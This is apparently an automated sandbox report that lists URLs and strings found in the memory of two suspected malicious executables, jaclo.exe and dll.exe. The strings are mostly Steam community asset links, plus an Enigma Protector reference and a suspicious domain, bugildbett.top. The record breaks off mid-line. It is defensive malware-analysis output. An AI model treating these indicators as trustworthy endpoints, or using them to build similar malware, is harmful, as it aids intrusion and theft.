Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000BFE000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef7K
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.clo
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612147123.0000000001255000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732
Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523296079.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=kLO
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/imagsM
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 